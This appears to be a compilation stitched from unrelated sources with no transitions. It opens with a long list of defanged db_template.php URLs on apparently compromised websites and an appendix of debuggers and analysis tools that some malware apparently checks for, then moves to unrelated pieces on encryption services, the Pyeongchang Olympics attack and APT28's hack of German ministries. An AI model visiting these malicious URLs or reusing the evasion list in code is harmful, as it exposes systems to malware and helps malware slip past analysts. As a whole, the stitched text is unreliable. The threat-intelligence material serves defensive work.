hxxp://www.loansonhomes[.]co.za//db_template.php

hxxp://edgesecurity[.]co.za/js/db_template.php

hxxp://highschoolsuperstar[.]co.za/files/db_template.php

hxxp://www.ambientproperty[.]com//db_template.php

hxxp://animationshowreel[.]co.il//db_template.php

hxxp://cafawelding[.]co.za/font-awesome/db_template.php

hxxp://apalawyers.pt//db_template.php

hxxp://www.edesignz[.]co.za//db_template.php

hxxp://centuryacademy[.]co.za/css/db_template.php

hxxps://ambyenta.hr//db_template.php

hxxp://ceramica[.]co.za//db_template.php

hxxp://www.alfredoposada[.]com//db_template.php

hxxp://anastasovsworkshop[.]com/wp-includes/db_template.php

hxxp://allisonplumbing[.]com/wp-includes/db_template.php

hxxp://eastrandmotorlab[.]co.za/fleet/db_template.php

hxxp://angelsongroup[.]com/wp-includes/db_template.php

hxxp://www.mikimaths[.]com//db_template.php

hxxp://hjb-racing[.]co.za/htdocs/db_template.php

hxxp://anotherpartofme[.]com/wp-includes/db_template.php

hxxp://www.andreabelfi[.]com//db_template.php

hxxp://www.iancullen[.]co.za//db_template.php

hxxp://alaskamaterials[.]com//db_template.php

hxxp://jeanetteproperties[.]co.za//db_template.php

hxxp://www.digitalmedia[.]co.za//db_template.php

hxxp://www.rejoicetheatre[.]com//db_template.php

hxxps://alterwebhost[.]com//db_template.php

hxxp://bc-u[.]co[.]uk//db_template.php

hxxp://dpscdgkhan.edu[.]pk/shopping/db_template.php

hxxp://edgeforensic[.]co.za//db_template.php

hxxp://willpowerpos[.]co.za//db_template.php

hxxp://antrismode[.]com/wp-includes/db_template.php

hxxp://colenesphotography[.]co.za/modules/db_template.php

hxxp://anthaigroup.vn//db_template.php

hxxps://alphainvestors[.]com.au//db_template.php

hxxps://aliart[.]nl//db_template.php

hxxps://allmantravel[.]com/thumbs/db_template.php

hxxp://fbrvolume[.]co.za//db_template.php

hxxp://amordegato[.]es/storefront/db_template.php

hxxp://agylub[.]com//db_template.php

hxxp://www.khotsonglodge.co.ls//db_template.php

hxxp://ampli5yd[.]com//db_template.php

hxxps://animeok[.]co.il//db_template.php

hxxps://arbeidsrechtcentrum[.]nl//db_template.php

hxxp://erniecommunications[.]co.za/js/db_template.php

hxxp://promechtransport[.]co.za/scripts/db_template.php

hxxp://centuriongsd[.]co.za//db_template.php

hxxp://www.agencesylvieleclerc[.]com//db_template.php

hxxp://delcom[.]co.za//db_template.php

hxxps://aleoestudio[.]com/gallonature/db_template.php

hxxp://oftheearthphotography[.]com/www/db_template.php

hxxp://h-dubepromotions[.]co.za//db_template.php

hxxp://www.alessioborzuola[.]com/downloads/db_template.php

hxxp://crystaltidings[.]co.za//db_template.php

hxxp://funeralbusinesssolution[.]com/email_template/db_template.php

hxxp://funisalodge[.]co.za/data1/db_template.php

hxxp://experttutors[.]co.za//db_template.php

hxxps://www[.]cartridgecave[.]co.za//db_template.php

hxxp://ecs-consult[.]com//db_template.php

hxxp://www.animationinisrael[.]org/tmp_images/db_template.php

hxxp://gideonitesprojects[.]com//db_template.php

hxxp://hybridauto[.]co.za/photography/db_template.php

hxxp://africanpixels.zar.cc//db_template.php

hxxp://ryanchristiefurniture[.]co.za//db_template.php

hxxp://evansmokaba[.]com/evansmokaba[.]com/thabiso/db_template.php

hxxp://almeriahotelja[.]com/dk/db_template.php

hxxp://al3abflash[.]biz//db_template.php

hxxp://www.fun4kidz[.]co.za//db_template.php

hxxp://alsharhanstore[.]com//db_template.php

hxxp://www[.]infratechconsulting[.]com//db_template.php

hxxp://algihad[.]com/assets/db_template.php

hxxp://americanwestmedia[.]com//db_template.php

hxxp://charliewestsecurity[.]co.za//db_template.php

hxxp://beehiveholdingszar[.]co.za//db_template.php

hxxp://analyticalfootball[.]com//db_template.php

hxxp://apiiination[.]com/leadership/db_template.php

hxxps://ahelicoptermom[.]com/wp-includes/db_template.php

hxxp://servicebox[.]co.za//db_template.php

hxxp://globalelectricalandconstruction[.]co.za/wpscripts/db_template.php

hxxps://aquo[.]in//db_template.php

hxxps://www.alfransia[.]com/wp-admin/db_template.php

hxxp://www.icsswaziland[.]com//db_template.php

hxxp://aiko.pro//db_template.php

hxxps://alceharfield[.]com//db_template.php

hxxp://indocraft[.]co.za/test/db_template.php

hxxp://allegiancesecurity[.]org//db_template.php

hxxp://sullivanprimary[.]co.za//db_template.php

hxxp://www.apmequestrian[.]com//db_template.php

hxxps://alphawaves[.]org/wp-admin/db_template.php

hxxp://www.alexandrasternin[.]com/illustration/db_template.php

hxxp://www.daleth[.]co.za//db_template.php

hxxp://jwseshowe[.]co.za/assets/db_template.php

hxxp://winagainstebola[.]com//db_template.php

hxxp://anubandh[.]in//db_template.php

hxxp://www.alexanderhomestead[.]com//db_template.php

hxxp://alfatek-intelligence[.]com//db_template.php

hxxp://www.aprendiendoencasa[.]com/wp-includes/db_template.php

hxxp://alorabrownies[.]com/wp-admin/db_template.php

hxxp://andrasadam[.]com/tothildiko/wp-includes/db_template.php

hxxp://cazochem[.]co.za/cazochem/db_template.php

hxxp://debnoch[.]com/image/db_template.php

hxxp://hmholdings360[.]co.za//db_template.php

hxxp://iinvest4u[.]co.za//db_template.php

hxxp://burgercoetzeeattorneys[.]co.za//db_template.php

hxxp://anngrigphoto[.]com//db_template.php

hxxp://alchemistasonida[.]com//db_template.php

hxxp://anahera[.]biz/admin/db_template.php

hxxp://h-u-i[.]co.za/heiren/db_template.php

hxxp://insta-art[.]co.za//db_template.php

hxxp://muallematsela[.]com//db_template.php

hxxp://aguasdecastilla[.]com/uploads/db_template.php

hxxp://www.arabgamenetwork[.]com//db_template.php

hxxps://arhiepiscopiabucurestilor[.]ro/templates/db_template.php

hxxp://amruthavana[.]com/blog/db_template.php

hxxp://digitalblue[.]co.za//db_template.php

hxxps://www.alvarezarquitectos[.]com//db_template.php

hxxp://buboobioinnovations[.]co.za/wpimages/db_template.php

hxxp://andrewsbisom[.]com//db_template.php

hxxp://www.m-3[.]co.za//db_template.php

hxxp://beesrenovations[.]co.za/images/db_template.php

hxxps://www.apliety[.]co.il/wp-includes/db_template.php

hxxp://alchamelup[.]org/htdocs/db_template.php

hxxp://benonicoc[.]co.za/resources/db_template.php

hxxps://al-mostakbl[.]com//db_template.php

hxxp://alchimiegrafiche[.]net/bbdelteatro/db_template.php

hxxp://andrespazsoldan[.]com//db_template.php

hxxp://in2accounting[.]co.za//db_template.php

hxxp://aipa[.]ca//db_template.php

hxxp://alphabee.fund/PHPMailer_5.2.0/db_template.php

hxxp://arabsdeals[.]com//db_template.php

hxxps://archiotronic[.]com/wp-includes/db_template.php

hxxp://capewindstrading[.]co.za//db_template.php

hxxps://althurayaa[.]com//db_template.php

hxxp://jhphotoedits[.]co.za//db_template.php

hxxp://cloudhub.co.ls/modules/db_template.php

hxxp://apironco[.]com/wp-includes/db_template.php

hxxp://digital-cameras-south-africa[.]co.za/script/db_template.php

hxxp://ahmadhasanat[.]com//db_template.php

hxxp://alexrocchi[.]com//db_template.php

hxxp://aljaadi[.]com//db_template.php

hxxps://www.engeltjieakademie[.]co.za//db_template.php

hxxp://annabelle[.]nl/next/db_template.php

hxxp://juniorad[.]co.za/vendor/db_template.php

hxxp://animationpulse[.]net//db_template.php

hxxp://angloglot[.]com//db_template.php

hxxp://agricolavicuna.cl//db_template.php

hxxp://alexelgy[.]com/allaccess/db_template.php

hxxp://www.centreforgovernance[.]uk//db_template.php

hxxp://www.aliandconsulting[.]com//db_template.php

hxxp://balaateen[.]co.za/less/db_template.php

hxxp://aleksicdunja[.]com//db_template.php

hxxp://arestihome[.]com//db_template.php

hxxp://am1int.fcomet[.]com/wp1/db_template.php

hxxp://anet-international-group[.]com/shop/db_template.php

hxxp://courtesydriving[.]co.za/js/db_template.php

hxxp://annaplebanek[.]com//db_template.php

hxxp://agencijazemil[.]com//db_template.php

hxxp://airminumtiro[.]com//db_template.php

hxxp://www.androidwikihow[.]com//db_template.php

hxxp://alisabyfinna[.]com//db_template.php

hxxp://rma-law[.]co.za//db_template.php

hxxp://amari[.]ro/components/db_template.php

hxxp://anxiousandunstoppable[.]com//db_template.php

hxxp://www.buhlebayoacademy[.]com//db_template.php

hxxp://arabellajo[.]com/wp/wp-includes/db_template.php

hxxp://blackthorn[.]co.za//db_template.php

hxxp://alaqaba[.]com/dnsarabia[.]com/db_template.php

hxxp://airesis.blog/wp-admin/db_template.php

hxxp://www.aptibet[.]org//db_template.php

hxxp://alecattic[.]com/wp-includes/db_template.php

hxxp://anglero[.]com//db_template.php

hxxp://getabletravel[.]co.za/wpscripts/db_template.php

hxxp://www.allwestdental[.]com/wp-includes/db_template.php

hxxp://printernet[.]co.za//db_template.php

hxxp://genesisbs[.]co.za//db_template.php

hxxp://allsporthealthandfitness[.]com//db_template.php

hxxp://www.humorcarbons[.]com//db_template.php

hxxp://intelligentprotection[.]co.za//db_template.php

hxxp://amazethings[.]com//db_template.php

hxxp://incoso[.]co.za/images/db_template.php

hxxp://www.antoanetapalikarska[.]com//db_template.php

hxxps://www.alteaparadise[.]com/wp-includes/db_template.php

hxxp://amirmenahem[.]com//db_template.php

hxxp://isound[.]co.za//db_template.php

hxxp://www.alestilorachel[.]com//db_template.php

hxxp://alcfm[.]net/wp-admin/db_template.php

hxxp://www.acer-parts[.]co.za//db_template.php

hxxp://www.gsmmid[.]com//db_template.php

hxxp://skhaleni[.]co.za//db_template.php

hxxps://amiici.vision//db_template.php

hxxps://andihaas[.]at/wp-includes/db_template.php

hxxp://www.albertaprimebeef[.]com//db_template.php

hxxps://www.appster[.]it/wp-includes/db_template.php

hxxp://amofoundation[.]org/wp-includes/db_template.php

hxxp://iqra[.]co.za/pub/db_template.php

hxxp://thecompasssolutions[.]co.za//db_template.php

hxxp://archwaycarpetscrm[.]co[.]uk//db_template.php

hxxp://iggleconsulting[.]com//db_template.php

hxxps://angel-blanco[.]net/wp-includes/db_template.php

hxxps://anotherdayinparadise[.]ca//db_template.php

hxxp://www.bitp[.]co.za//db_template.php

hxxp://cupboardcure[.]co.za/vendor/db_template.php

hxxp://all2wedding[.]com/wp-includes/db_template.php

hxxp://allianz[.]com.pe/wp-admin/db_template.php

hxxp://amiehepperlin[.]com//db_template.php

hxxps://www.amighini[.]it/webservice/db_template.php

hxxp://broken-arrow[.]co.za//db_template.php

hxxp://www.ihlosiqs-pm[.]co.za//db_template.php

hxxp://alisimple[.]si/wp-includes/db_template.php

hxxp://allthat[.]social//db_template.php

hxxp://www.amphibiblechurch[.]com//db_template.php

hxxp://bestencouragementwords[.]com//db_template.php

hxxp://alayhamtechnologies[.]com//db_template.php

hxxps://alaskanharvestseafood[.]com/backup/db_template.php

hxxps://www.air-mag[.]ro//db_template.php

hxxp://get-paid-for-online-survey[.]com//db_template.php

hxxp://www.antc[.]ch/wp-includes/db_template.php

hxxp://firstchoiceproperties[.]co.za//db_template.php

hxxp://habibtextiles[.]pk//db_template.php

hxxp://fsproperties[.]co.za/engine1/db_template.php

hxxp://diegemmerkat[.]co.za//db_template.php

hxxp://molepetravel.co.ls//db_template.php

hxxp://mmetl[.]co.za//db_template.php

hxxp://altrablog[.]com//db_template.php

hxxp://abrahamseed[.]co.za//db_template.php

hxxp://www.amerindgen[.]com/author/admin1/db_template.php

hxxp://altcoinaddict[.]com//db_template.php

hxxp://iiee.edu[.]pk//db_template.php

hxxp://cmhts[.]co.za/resources/db_template.php

hxxp://domesticguardians[.]co.za/Banner/db_template.php

hxxps://amishcountryfurnishings[.]com//db_template.php

hxxps://allday[.]gr//db_template.php

hxxp://www.alinn-u-yin[.]com//db_template.php

hxxps://www.allin-chain[.]com//db_template.php

hxxps://www.anatapackaging[.]com/vendors/db_template.php

hxxp://alexcelts[.]com/wp/db_template.php

hxxp://www.allstylus[.]com.br//db_template.php

hxxp://www.algom-law[.]com//db_template.php

hxxp://ambiances-toiles[.]fr//db_template.php

Appendix

Security Tools Checked on the Machine

win32_remote

win64_remote64

ollydbg

ProcessHacker

tcpview

autoruns

autorunsc

filemon

procmon

regmon

procexp

idaq

idaq64

ImmunityDebugger

Wireshark

dumpcap

HookExplorer

ImportREC

PETools

LordPE

dumpcap

SysInspector

proc_analyzer

sysAnalyzer

sniff_hit

windbg

joeboxcontrol

joeboxserver

How to evaluate and select the best encryption services

Encryption is, after all, necessary, so the only discussion about this technology and these services should be about choosing a solution.

When it comes to truly protecting data, encryption is a no-brainer. In fact, some industry regulations require that businesses and associations encrypt specific information. Health care is a prime example of this, but organizations in all sectors have a responsibility to protect their customer and client information, whether it's personally identifiable information or an email between colleagues.

Winter Olympics Cyber Attack Signs Point to Russia – So Why the False-Flag?

A cyber attack disrupted the opening ceremony of the recent Olympic Games, as confirmed by a spokesman for the Pyeongchang Organizing Committee.  The disruption took out Internet access and telecasts on non-critical machines, grounded broadcasters’ drones, shut down the Pyeongchang 2018 website, and prevented spectators from printing out reservations and attending the ceremony.

Per reports, the attackers gained access to approximately 300 computers, hacked routers, and distributed malware in the lead-up to and during the event’s ceremonies.  Initial findings by at least one computer security company concluded that the attack had started a year in advance.  According to the company’s researchers, the attackers could have destroyed computers but restrained themselves, erasing only the backup files on Windows machines.  It was concluded that the attack was an attempt to send a political message.  As of this writing, the initial attack vector has not been determined, or at least not made public, although speculation is that access was gained earlier and used to launch this attack.

According to one news source citing U.S. intelligence officials, Russian spies were behind the cyber attack, retaliating for Russia’s suspension from competing in the games over a doping scandal.  Of note, these officials believe the attack was intended as a “false-flag” operation, as the attackers are alleged to have used North Korean IP addresses and other “tactics” to make it appear that North Korea was behind the attacks.  The government has so far produced no evidence, as it did when supporting its claims of North Korea’s culpability in the Sony hack.

While there may very well be classified information that helps attribute this activity, motivation is largely the incriminating piece of evidence that points to Russian culpability.  Paying back the International Olympic Committee (IOC) for not allowing Russian athletes to compete under the national flag would be consistent with fervent Russian nationalism and its need to protect all aspects of its cultural identity.  Russian state or state-affiliated actors are alleged to have orchestrated previous cyber attacks against Olympic targets, notably the 2016 cyber attack against the World Anti-Doping Agency in which the attackers gained access to athlete data, including confidential medical data, and made it public.

If motive is going to be the primary factor in attribution (note that malware analysis provided no clues, since the malware incorporated traits of malware used by a variety of suspected state actors), then at the time of the attack only two governments were probable suspects – North Korea and Russia.  However, after tumultuous events over nuclear weapon development and missile firings, North Korea made grand diplomatic overtures to South Korea and ultimately marched with it under one flag.  It would seem improbable that it would want to detract from the headway made through its Olympic diplomacy with a nuisance attack.

Still stinging from its inability to march under its own flag, Russia seems the probable suspect behind the cyber attack, wanting to express its dissatisfaction with the IOC.  If true, the fact that it could have done far more damage and did not is testament that Russia wanted to register displeasure, not punish South Korea for the IOC’s decision.

However, what gives pause is why – if the reporting is correct – state actors of the Russian government were needed to conduct a false-flag attack simply to demonstrate discontent with the IOC.  Simply put, a false-flag operation is one in which an attacker tries to make their actions look like the work of another known attacker.  In cyberspace such an endeavor is easy to achieve, especially when the tactics, techniques, and procedures (TTP) – which often include methods of operation, malware, and command-and-control architecture – are published for global consumption as Indicators of Compromise.  In this instance, the attack blended TTPs and the digital fingerprints of threat actors connected to North Korea, China, and Russia.

Cyber proxies such as non-state hacker groups are perfect agents for states wanting to send a signal to a government without committing their own resources.  There is a level – albeit shallow – of plausible deniability that an aggressor state can claim while still intimating to the victim its tacit involvement in the attack.  Russia has at its disposal a capable cyber criminal underground, as well as nationalistic youth groups, that could have achieved a similar effect.  This was evidenced in 2007 when one such group claimed responsibility for the cyber attacks against Estonia over the removal of a Soviet war memorial.

The use of state actors to commit the cyber equivalent of a tantrum raises eyebrows.  According to one source, the Russian state hackers behind this attack were the same ones that have been engaged in cyber attacks against Ukraine.  Making a public statement doesn’t seem the type of operation an elite unit would be called upon to execute.

So why the false-flag?  There are a few possibilities.  One, Russia wanted to test using the TTPs of other nations in an operation to gauge what conclusions defenders would draw.  Two, Russia may have “signaled” to nations like the United States – and to the private sector companies following its alleged activities – that it would be implementing false-flags in future operations, essentially rendering technical indicators and digital forensic analysis useless for attribution.  Three, maybe the cyber attack achieved another objective in addition to expressing anger.  Did another attack, perhaps more surreptitious, occur simultaneously against another target while all eyes were focused on this one?

Russia’s cyber operations (including cyber attacks) have been described as anything from sloppy to among the most advanced in the world.  Perhaps the question that should be asked is why Russia wanted a “false flag” operation to be so easily attributed.

Perhaps the answer lies with the simplest explanation: that it was just the easiest path to take.  And in a world where there is no international consensus on state behavior in cyberspace, the landscape favors the attackers until the defenders figure out how to respond to them with enough conviction to alter attacker behavior.  No one looks to have that answer.

This is a guest post written by Emilio Iasiello

The post Winter Olympics Cyber Attack Signs Point to Russia – So Why the False-Flag? appeared first on cyberdb.co.

The Myth of “Staying One Step Ahead of the Hackers”

The assumption that software security can stay ahead of the hackers is not true, because the software security industry is always reacting to threats that hackers expose. Once hackers start exploiting a flaw in an application, security companies try to block the resulting threat by providing security updates for existing software or by developing new programs. Either way, the hackers will be one step ahead, because the software security industry can’t predict what new threats they will unleash.

RUSSIA DENIES CYBER ATTACK ON GERMANY

IN BRIEF: Network systems in several German government ministries were hit by a hack that led to the theft of some data, while some media outlets have blamed Russia for the cyber attack. Germany's economy minister, for her part, said they are not certain that Russia was involved in the attack. Russia has also denied involvement in the attack.
------------------------------------------

Major powers with cyber capabilities have been accusing one another whenever cyber attacks occur in those nations. Russia, China and North Korea have been the most frequently accused by European nations and the United States.

---------------------
NOTICE: Tanzania's ICT Commission has held its first session dedicated to discussing cyber security matters in the country, at which many issues were highlighted and the main goal was to ensure we achieve a cyber-secure nation.
---------------------

Germany has recently suffered a cyber attack on, so far, two of its ministries, which has led to some of those ministries' data ending up in the hands of cyber criminals.


German members of parliament have blamed the government for not informing them about the cyber attacks, while the German parliament's digital affairs committee convened an emergency session to review the report on the hack, which was discovered at the end of February this year, 2018.

One member of the digital committee, Anke Domscheit-Berg of the left-wing party Die Linke, stated that the German government should have known about the cyber attacks earlier and contained them.



The German news agency DPA quoted unnamed security sources as saying that Russia's APT28 group hacked the communication systems of Germany's foreign and interior ministries and succeeded in stealing data.

The agency says the attacks were discovered in December last year and may have been ongoing for a whole year.

Thomas de Maiziere, German Interior Minister

Following that report, the interior ministry confirmed that federal government computers had been hacked, saying the attacks concerned matters unrelated to government secrets and that they had been contained.

However, a spokesperson for the ministry could not provide further details on the matter, saying it is under investigation and that security measures continue to be taken.

But according to German media, the intrusion was allowed to continue until February 28, 2018 so that investigators could gather information on its scope, objectives and the perpetrators themselves.

"If confirmed to be true, this would be a form of war against Germany," said the head of the German parliament's digital affairs committee, Dieter Janacek, of the environmentalist party Die Grüne, according to the newspaper Berliner Zeitung.

Janacek described the attacks as extremely serious and called on the government to bring all the information it has before parliament.

The first Cyber Security sessions organised by the ICT Commission in Tanzania

Asked whether the attacks were carried out by a Russian-backed group, a member of parliament from Chancellor Angela Merkel's CDU/CSU alliance defended the government's strategy of withholding information. Stephan Mayer of the CSU said "a complete and thorough investigation" was needed "but not one conducted in public." The MP added that "casting suspicion on others cannot help that investigation".

The APT28 group, sometimes called Fancy Bear, which is linked to the Russian military's intelligence service, has previously been named in connection with cyber attacks against the German parliament in 2015, as well as against NATO offices and governments in Eastern Europe.

Brigitte Zypries, Minister of Energy and Economy, Germany

Germany's energy and economy minister, Hon. Brigitte Zypries, has already commented on this attack, stating that there is no evidence proving that Russia was involved.

Russia, for its part, has also denied involvement in the attack.